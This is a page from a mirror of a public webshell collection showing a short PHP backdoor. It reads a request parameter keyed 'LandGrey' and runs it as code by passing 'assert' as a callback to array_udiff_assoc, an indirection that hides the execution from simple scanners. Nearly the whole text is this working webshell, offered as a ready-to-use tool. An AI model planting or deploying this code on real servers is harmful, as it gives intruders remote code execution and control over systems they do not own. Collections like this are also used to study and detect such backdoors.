mirror of
https://github.com/tennc/webshell
synced 2024-11-12 22:47:15 +00:00
9 lines
145 B
PHP
9 lines
145 B
PHP
|
<?php
|
||
|
/**
|
||
|
* Noticed: (PHP 5 >= 5.4.0, PHP 7)
|
||
|
*
|
||
|
*/
|
||
|
$password = "LandGrey";
|
||
|
array_udiff_assoc(array($_REQUEST[$password]), array(1), "assert");
|
||
|
?>
|